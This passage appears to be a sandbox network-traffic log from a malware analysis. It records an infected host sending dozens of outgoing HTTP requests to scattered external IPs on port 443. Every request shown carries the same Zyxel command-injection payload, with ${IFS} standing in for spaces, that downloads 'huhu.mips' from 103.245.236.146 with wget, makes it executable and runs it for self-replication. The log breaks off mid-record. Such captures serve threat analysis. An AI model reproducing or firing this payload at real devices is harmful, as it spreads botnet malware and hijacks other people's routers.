                                                  Jan 19, 2024 18:23:59.128027916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5266192.168.2.1335612146.54.115.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128062963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5267192.168.2.13499722.159.206.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128091097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5268192.168.2.133516271.191.56.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128144026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5269192.168.2.133945487.2.13.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128185034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5270192.168.2.1357160123.27.126.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128226995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5271192.168.2.1338722144.223.105.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128262043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5272192.168.2.1359104190.249.4.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128304005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5273192.168.2.1345478141.87.243.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128357887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5274192.168.2.133658078.46.79.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128401041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5275192.168.2.135295227.10.31.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128437996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5276192.168.2.1333962182.151.215.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128477097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5277192.168.2.1355612221.181.18.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128528118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5278192.168.2.1357770121.158.83.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128560066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5279192.168.2.134383867.246.36.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128602982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5280192.168.2.135683499.46.147.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128633022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5281192.168.2.1353164115.172.108.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128664017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5282192.168.2.1336980166.146.123.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128710032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5283192.168.2.1337162116.241.192.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128751040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5284192.168.2.133462472.148.2.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128784895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5285192.168.2.1334128101.173.207.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128823996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5286192.168.2.1345726203.121.207.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128880978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5287192.168.2.1338694201.208.167.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128926992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5288192.168.2.1357526139.199.81.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128956079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5289192.168.2.1334844133.140.66.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.128993034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5290192.168.2.1339746175.0.128.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129024029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5291192.168.2.135313485.58.243.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129072905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5292192.168.2.1354498196.105.242.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129125118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5293192.168.2.1340608203.254.149.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129158974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5294192.168.2.1355548194.194.155.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129196882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5295192.168.2.134097235.149.25.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129240990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5296192.168.2.133584259.103.48.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129255056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5297192.168.2.135238067.176.13.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129302979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5298192.168.2.1350142173.242.82.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129339933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5299192.168.2.1338100213.249.100.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129375935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5300192.168.2.1350770111.149.150.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129400015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5301192.168.2.1347286151.156.107.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129456043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5302192.168.2.1348878189.184.218.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129493952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5303192.168.2.1345594132.18.43.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129540920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5304192.168.2.1353460184.177.159.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129590034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5305192.168.2.1346054120.31.215.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129622936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5306192.168.2.1344920212.53.201.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129656076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5307192.168.2.13593021.236.162.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129708052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5308192.168.2.135402036.75.7.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129772902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5309192.168.2.1343154159.38.40.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129776955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5310192.168.2.1348008128.99.254.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129828930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5311192.168.2.1358564147.215.56.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129861116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5312192.168.2.1346222178.124.40.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129914999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5313192.168.2.1352770120.38.194.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129931927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5314192.168.2.134881278.56.25.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.129980087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5315192.168.2.1352692173.71.31.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130016088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5316192.168.2.1339152141.69.106.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130043030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5317192.168.2.13439841.68.168.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130105972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5318192.168.2.1337328163.236.107.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130141973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5319192.168.2.1351134183.158.220.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130176067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5320192.168.2.1344552164.197.104.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130199909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5321192.168.2.1338198114.109.82.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130249023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5322192.168.2.135768075.115.118.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130259991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5323192.168.2.1356920153.193.128.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130289078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5324192.168.2.13334581.24.39.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130346060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5325192.168.2.1360542196.173.225.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130386114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5326192.168.2.1348250123.85.247.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130440950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5327192.168.2.133366477.222.192.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130517960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5328192.168.2.1347454177.42.7.150443
                                                  TimestampBytes transferredDirectionData
